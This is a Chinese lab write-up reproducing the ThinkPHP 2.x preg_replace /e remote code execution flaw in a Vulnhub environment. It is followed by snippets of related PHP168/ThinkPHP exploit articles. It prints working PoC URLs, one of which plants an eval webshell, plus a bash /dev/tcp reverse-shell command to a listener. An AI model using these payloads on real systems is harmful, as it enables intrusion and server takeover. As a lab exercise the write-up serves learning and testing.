Php168代码执行漏洞,Vulnhub-ThinkPHP 2.x 任意代码执行漏洞

最新推荐文章于 2021-03-29 08:11:43 发布

weixin_39637711

最新推荐文章于 2021-03-29 08:11:43 发布

阅读量201

点赞数

文章标签： Php168代码执行漏洞

郑重声明：所用漏洞环境为自建虚拟机vulnhub靶机环境，仅供本人学习使用。

漏洞简述

ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由：

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。

准备环境

测试机IP：192.168.79.129

靶机IP：192.168.79.131

1. 启动Vulnhub靶机环境：

34c4f74e9909

2. 验证靶机应用启用成功：

34c4f74e9909

漏洞复现

POC 引用：http://ip:8080/index.php?s=/index/index/name/${@phpinfo()}

34c4f74e9909

http://ip:8080/index.php?s=a/b/c/${@print(eval($_POST[1]))}

34c4f74e9909

准备反弹Shell文件shell.sh

bash -i >& /dev/tcp/192.168.79.129/4444 0>&1

启http server

34c4f74e9909

使用NC侦听反弹端口

34c4f74e9909

上传并执行反弹Shell文件

34c4f74e9909

得到反弹Shell

34c4f74e9909

关闭环境

34c4f74e9909

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_39637711

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

Thinkphp V5.X 远程代码执行漏洞 - POC（精：集群5.0*、5.1*、5.2*）

墨痕诉清风的博客

11-07

4491

官方公告:1、2、POC：批量检测单个检测。

php168 6.02漏洞,PHP168 V6.02整站系统远程执行任意代码漏洞

weixin_30695935的博客

03-11

854

PHP168在某些函数里运用了eval函数,但是某数组没有初试化,导致可以提交任意代码执行.漏洞出在inc/function.inc.php里面.get_html_url()这个函数.function get_html_url(){global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type;$id=$aid;if($pa...

参与评论您还未登录，请先登录后发表或查看评论

php168v4.0漏洞,PHP168 V4.0 cookie欺骗 EXP

weixin_35958479的博客

03-10

282

漏洞的原理：具体的请看admin/global.php这个文件里面关于用户登陆部分的代码，这里截取一下。。。/*用户登录*/if($_POST[loginname]&&$_POST[loginpwd]){if($webdb[yzImgAdminLogin]){if(!get_cookie("yzImgNum")||get_cookie("yzImgNum")!=$yzi...

php168sql注入漏洞

08-15

php168某版本存在sql注入，可通过该漏洞获取数据库信息

php168v4.0漏洞,Php168 v 4.0 sp global.php 写入漏洞

weixin_31361715的博客

03-10

115

在global.php中有这样的代码:function login_logs($username,$password){global $timestamp,$onlineip;$logdb[]=\"$username\\t$password\\t$timestamp\\t$onlineip\";@include(PHP168_PATH.\"cache/adminlogin_logs.php\");...

原php168的一个漏洞

qq_15618849的专栏

03-10

1651

这个问题是程序员容易忽略的，往往只是依靠gpc或addslashes函数对用户直接输入的数据进行处理，这样数据中的'"等都会被\转义，这样就能正确的执行sql语句，有效防止注入攻击了。但存入数据库的数据呢？在执行完sql语句存入数据库的是经过gpc处理前的原始数据，那么当程序再select出的就是受污染的数据了，如果把select出的数据再执行sql语句，那么就触发了sqlinj,如果直接写入缓存

ThinkPHP漏洞系列/2.x 任意代码执行漏洞

jammny

11-17

1414

漏洞详情： ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由：$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。影响版本： Thinkphp2.x系列以及ThinkPHP 3.0版.

php/5.2.17漏洞,【漏洞预警】ThinkPHP5远程代码执行漏洞

weixin_36073714的博客

03-12

1431

2018年12月10日,白帽汇安全研究院发现thinkphp官网发布了安全更新，修复了一个远程代码执行漏洞，该漏洞是由于框架对控制器名没有进行敏感字符检测，导致在没有开启强制路由的情况下可能导致远程代码执行。主要影响的版本为5.0.23和5.1.31之前的所有版本。此次爆出漏洞的ThinkPHP 5.x版本是官方于2015年发布的新一代框架，其中5.1.0RC版本于今年的5月2日发布，但在短短几个...

Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1

08-03

### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行（RCE）漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行（RCE）漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...

ThinkPHP v5.x命令执行利用工具（可getshell）

11-19

在这个场景中，"ThinkPHP v5.x命令执行利用工具（可getshell）"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具，该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。命令执行漏洞...

PHP168 0Day 文件代码泄露漏洞利用工具

03-24

PHP168 0Day 文件代码泄露漏洞利用工具

php168下载任意文件漏洞利用工具

05-22

php168下载任意文件内部用的。。现在共享上来拿积分的,点击查看代码后等上三秒钟如果有漏洞就可以看到对方的源代码了。。。

thinkphp5.X-Batch-getshell-master.rar

03-31

"thinkphp5.X-Batch-getshell-master"这个项目名暗示了该压缩包包含的是针对ThinkPHP5.x框架的批量getshell攻击方法集合，可能包括了不同版本的PoC（Proof of Concept）代码，用于演示和验证这些漏洞的存在。...

php 168任意代码执行漏洞之php的Complex (curly) syntax

weixin_30415113的博客

04-27

419

今天了解了php 168的任意代码执行漏洞，Poc: http://192.168.6.128/pentest/cms/php168/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML 通过代码审计得知，最后会执行 eval("\$array...

php168系统漏洞,php168某系统注入漏洞

weixin_28885435的博客

03-29

356

漏洞概要缺陷编号：WooYun-2012-013476漏洞标题：php168某系统注入漏洞相关厂商：PHP168漏洞作者：书生提交时间：2012-10-17 22:33公开时间：2012-10-17 22:33漏洞类型：SQL注射漏洞危害等级：高自评Rank：20漏洞状态：未联系到厂商或者厂商积极忽略Tags标签：漏洞详情披露状态：2012-10-17: 积极联系厂商并且等待厂商认领中，细节不对外...

PHP168 6.0及以下版本漏洞

CURSED!

09-23

243

PHP168 6.0及以下版本漏洞 # 鬼仔：未测试。最近比较忙，所以很多东西都更新不及时，也有好多没贴上来，抱歉，这几天整理下，把积攒的都更新了。来源：chinesehonker 危险等级：高影响版本：PHP168 6.0以下版本入侵者可以在用户登陆页面构造特殊语句，将PHP一句话写入cache目录，从而获得使用PHP168整站程序网站的WEBSHELL权限。测试语...

php 168,PHP168一个神奇的漏洞，可查询任意用户数据

weixin_39914107的博客

03-10

1186

国微PHP168中出现了一处神奇的array，可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中，这个页面不会在前台使用，但可直接通过URL进行访问。页面路由为：/homepage.php/[用户名]/member-profile以PHP168官方演示站点为例，查看任意用户信息的页面...

php168 blog,PHP168 CMS的一次新异漏洞分析

weixin_32019949的博客

03-20

345

作者：李丰初admin/global.php对后台管理的用户名与密码没有任何过滤产生了这个漏洞if( $_POST[loginname] && $_POST[loginpwd] ){if( $webdb[yzImgAdminLogin] ){if(!get_cookie("yzImgNum")||get_cookie("yzImgNum")!=$yzimg){die("验证码不符合...

php168上传漏洞,CVE-2009-2265 FCKeditor connector.php任意文件上传漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客，安全资讯平台...

weixin_40002692的博客

03-28

399

### $Id: coldfusion_fckeditor.rb 11127 2010-11-24 19:35:38Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the...

thinkphp 2.x 任意代码执行漏洞